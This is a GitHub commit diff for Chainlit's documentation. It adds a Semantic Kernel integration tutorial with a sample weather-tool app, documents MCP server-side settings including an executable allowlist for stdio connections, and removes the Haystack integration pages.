Skip to content

Commit 188b2f3

Browse files
committed
add semantic kernel doc and update mcp doc
1 parent 49b6642 commit 188b2f3

File tree

10 files changed

+164
-160
lines changed

10 files changed

+164
-160
lines changed

advanced-features/mcp.mdx

+24
Original file line numberDiff line numberDiff line change
@@ -40,6 +40,30 @@ Chainlit supports two types of MCP connections:
4040
4141
<Note>**Command Availability Warning**: When using the stdio connection type with commands like `npx` or `uvx`, these commands must be available on the Chainlit server where the application is running. The subprocess is executed on the server, not on the client machine.</Note>
4242

43+
### Server-Side Configuration (`config.toml`)
44+
45+
You can control which MCP connection types are enabled globally and restrict allowed stdio commands by modifying your project's `config.toml` file (usually located at the root of your project or `.chainlit/config.toml`).
46+
47+
Under the `[features.mcp]` section, you can configure SSE and stdio separately:
48+
49+
```toml
50+
[features]
51+
# ... other feature flags
52+
53+
[features.mcp.sse]
54+
# Enable or disable the SSE connection type globally
55+
enabled = true
56+
57+
[features.mcp.stdio]
58+
# Enable or disable the stdio connection type globally
59+
enabled = true
60+
# Define an allowlist of executables for the stdio type.
61+
# Only the base names of executables listed here can be used.
62+
# This is a crucial security measure for stdio connections.
63+
# Example: allows running `npx ...` and `uvx ...` but blocks others.
64+
allowed_executables = [ "npx", "uvx" ]
65+
```
66+
4367
## Setup
4468

4569
### 1. Register Connection Handlers

api-reference/integrations/haystack.mdx

-60
This file was deleted.

get-started/overview.mdx

+21-30
Original file line numberDiff line numberDiff line change
@@ -5,13 +5,7 @@ title: "Overview"
55
Chainlit is an open-source Python package to build production ready Conversational AI.
66

77
<Frame caption="Build Conversational AI with Chainlit">
8-
<video
9-
controls
10-
autoPlay
11-
loop
12-
muted
13-
src="/images/overview.mp4"
14-
/>
8+
<video controls autoPlay loop muted src="/images/overview.mp4" />
159
</Frame>
1610

1711
## Key features
@@ -31,13 +25,19 @@ Chainlit is an open-source Python package to build production ready Conversation
3125
Chainlit is compatible with all Python programs and libraries. That being said, it comes with a set of integrations with popular libraries and frameworks.
3226

3327
<CardGroup cols={2}>
34-
<Card
35-
title="OpenAI"
28+
<Card
29+
title="LangChain"
3630
icon="circle"
37-
color="#dddddd"
38-
href="/integrations/openai">
39-
Learn how to explore your OpenAI calls in Chainlit.
40-
</Card>
31+
color="#3afadc"
32+
href="/integrations/langchain"
33+
>
34+
Learn how to use any LangChain agent with Chainlit.
35+
</Card>
36+
37+
{" "}
38+
<Card title="OpenAI" icon="circle" color="#dddddd" href="/integrations/openai">
39+
Learn how to explore your OpenAI calls in Chainlit.
40+
</Card>
4141

4242
<Card
4343
title="OpenAI Assistant"
@@ -58,21 +58,21 @@ Chainlit is compatible with all Python programs and libraries. That being said,
5858
</Card>
5959

6060
<Card
61-
title="Llama Index"
61+
title="Semantic Kernel"
6262
icon="circle"
63-
color="#0285c7"
64-
href="/integrations/llama-index"
63+
color="#16a34a"
64+
href="/integrations/semantic-kernel"
6565
>
66-
Learn how to integrate your Llama Index code with Chainlit.
66+
Learn how to integrate your Semantic Kernel code with Chainlit.
6767
</Card>
6868

6969
<Card
70-
title="LangChain"
70+
title="Llama Index"
7171
icon="circle"
72-
color="#3afadc"
73-
href="/integrations/langchain"
72+
color="#0285c7"
73+
href="/integrations/llama-index"
7474
>
75-
Learn how to use any LangChain agent with Chainlit.
75+
Learn how to integrate your Llama Index code with Chainlit.
7676
</Card>
7777

7878
<Card
@@ -84,13 +84,4 @@ Chainlit is compatible with all Python programs and libraries. That being said,
8484
Learn how to integrate your Autogen agents with Chainlit.
8585
</Card>
8686

87-
<Card
88-
title="Haystack"
89-
icon="circle"
90-
color="#16a34a"
91-
href="/integrations/haystack"
92-
>
93-
Learn how to integrate your Haystack code with Chainlit.
94-
</Card>
95-
9687
</CardGroup>

integrations/haystack.mdx

-60
This file was deleted.

integrations/litellm.mdx

+1-1
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ The benefits of using LiteLLM Proxy with Chainlit is:
1212

1313
<Warning>
1414
You shouldn't configure this integration if you're already using another
15-
integration like Haystack, Langchain or LlamaIndex. Both integrations would
15+
integration like Langchain or LlamaIndex. Both integrations would
1616
record the same generation and create duplicate steps in the UI.
1717
</Warning>
1818

integrations/message-based.mdx

+1-1
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ title: vLLM, LMStudio, HuggingFace
55
We can leverage the OpenAI instrumentation to log calls from inference servers that use messages-based API, such as vLLM, LMStudio or HuggingFace's TGI.
66

77
<Warning>
8-
You shouldn't configure this integration if you're already using another integration like Haystack, LangChain or LlamaIndex. Both integrations would record the same generation and create duplicate steps in the UI.
8+
You shouldn't configure this integration if you're already using another integration like LangChain or LlamaIndex. Both integrations would record the same generation and create duplicate steps in the UI.
99
</Warning>
1010

1111
Create a new Python file named `app.py` in your project directory. This file will contain the main logic for your LLM application.

integrations/mistralai.mdx

+1-1
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@ You will get the full generation details (prompt, completion, tokens per second.
66

77
<Warning>
88
You shouldn't configure this integration if you're already using another
9-
integration like Haystack, Langchain or LlamaIndex. Both integrations would
9+
integration like Langchain or LlamaIndex. Both integrations would
1010
record the same generation and create duplicate steps in the UI.
1111
</Warning>
1212

integrations/openai.mdx

+1-1
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ You need to add `cl.instrument_openai()` after creating your OpenAI client.
1616

1717
<Warning>
1818
You shouldn't configure this integration if you're already using another
19-
integration like Haystack, Langchain or LlamaIndex. Both integrations would
19+
integration like Langchain or LlamaIndex. Both integrations would
2020
record the same generation and create duplicate steps in the UI.
2121
</Warning>
2222

integrations/semantic-kernel.mdx

+110
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,110 @@
1+
---
2+
title: Semantic Kernel
3+
---
4+
5+
In this tutorial, we'll walk through the steps to create a Chainlit application integrated with [Microsoft's Semantic Kernel](https://github.com/microsoft/semantic-kernel). The integration automatically visualizes Semantic Kernel function calls (like plugins or tools) as Steps in the Chainlit UI.
6+
7+
## Prerequisites
8+
9+
Before getting started, make sure you have the following:
10+
11+
- A working installation of Chainlit
12+
- The `semantic-kernel` package installed
13+
- An LLM API key (e.g., OpenAI, Azure OpenAI) configured for Semantic Kernel
14+
- Basic understanding of Python programming and Semantic Kernel concepts (Kernel, Plugins, Functions)
15+
16+
## Step 1: Create a Python file
17+
18+
Create a new Python file named `app.py` in your project directory. This file will contain the main logic for your LLM application using Semantic Kernel.
19+
20+
## Step 2: Write the Application Logic
21+
22+
In `app.py`, import the necessary packages, set up your Semantic Kernel `Kernel`, add the `SemanticKernelFilter` for Chainlit integration, and define functions to handle chat sessions and incoming messages.
23+
24+
Here's an example demonstrating how to set up the kernel and use the filter:
25+
26+
```python app.py
27+
import chainlit as cl
28+
import semantic_kernel as sk
29+
from semantic_kernel.connectors.ai import FunctionChoiceBehavior
30+
from semantic_kernel.connectors.ai.open_ai import (
31+
OpenAIChatCompletion,
32+
OpenAIChatPromptExecutionSettings,
33+
)
34+
from semantic_kernel.functions import kernel_function
35+
from semantic_kernel.contents import ChatHistory
36+
37+
request_settings = OpenAIChatPromptExecutionSettings(
38+
function_choice_behavior=FunctionChoiceBehavior.Auto(filters={"excluded_plugins": ["ChatBot"]})
39+
)
40+
41+
# Example Native Plugin (Tool)
42+
class WeatherPlugin:
43+
@kernel_function(name="get_weather", description="Gets the weather for a city")
44+
def get_weather(self, city: str) -> str:
45+
"""Retrieves the weather for a given city."""
46+
if "paris" in city.lower():
47+
return f"The weather in {city} is 20°C and sunny."
48+
elif "london" in city.lower():
49+
return f"The weather in {city} is 15°C and cloudy."
50+
else:
51+
return f"Sorry, I don't have the weather for {city}."
52+
53+
@cl.on_chat_start
54+
async def on_chat_start():
55+
# Setup Semantic Kernel
56+
kernel = sk.Kernel()
57+
58+
# Add your AI service (e.g., OpenAI)
59+
# Make sure OPENAI_API_KEY and OPENAI_ORG_ID are set in your environment
60+
ai_service = OpenAIChatCompletion(service_id="default", ai_model_id="gpt-4o")
61+
kernel.add_service(ai_service)
62+
63+
# Import the WeatherPlugin
64+
kernel.add_plugin(WeatherPlugin(), plugin_name="Weather")
65+
66+
# Instantiate and add the Chainlit filter to the kernel
67+
# This will automatically capture function calls as Steps
68+
sk_filter = cl.SemanticKernelFilter(kernel=kernel)
69+
70+
cl.user_session.set("kernel", kernel)
71+
cl.user_session.set("ai_service", ai_service)
72+
cl.user_session.set("chat_history", ChatHistory())
73+
74+
@cl.on_message
75+
async def on_message(message: cl.Message):
76+
kernel = cl.user_session.get("kernel") # type: sk.Kernel
77+
ai_service = cl.user_session.get("ai_service") # type: OpenAIChatCompletion
78+
chat_history = cl.user_session.get("chat_history") # type: ChatHistory
79+
80+
# Add user message to history
81+
chat_history.add_user_message(message.content)
82+
83+
# Create a Chainlit message for the response stream
84+
answer = cl.Message(content="")
85+
86+
async for msg in ai_service.get_streaming_chat_message_content(
87+
chat_history=chat_history,
88+
user_input=message.content,
89+
settings=request_settings,
90+
kernel=kernel,
91+
):
92+
if msg.content:
93+
await answer.stream_token(msg.content)
94+
95+
# Add the full assistant response to history
96+
chat_history.add_assistant_message(answer.content)
97+
98+
# Send the final message
99+
await answer.send()
100+
```
101+
102+
## Step 3: Run the Application
103+
104+
To start your app, open a terminal and navigate to the directory containing `app.py`. Then run the following command:
105+
106+
```bash
107+
chainlit run app.py -w
108+
```
109+
110+
The `-w` flag tells Chainlit to enable auto-reloading, so you don't need to restart the server every time you make changes to your application. Your chatbot UI should now be accessible at http://localhost:8000. Interact with the bot, and if you ask for the weather (and the LLM uses the tool), you should see a "Weather-get_weather" step appear in the UI.

0 commit comments

Comments
 (0)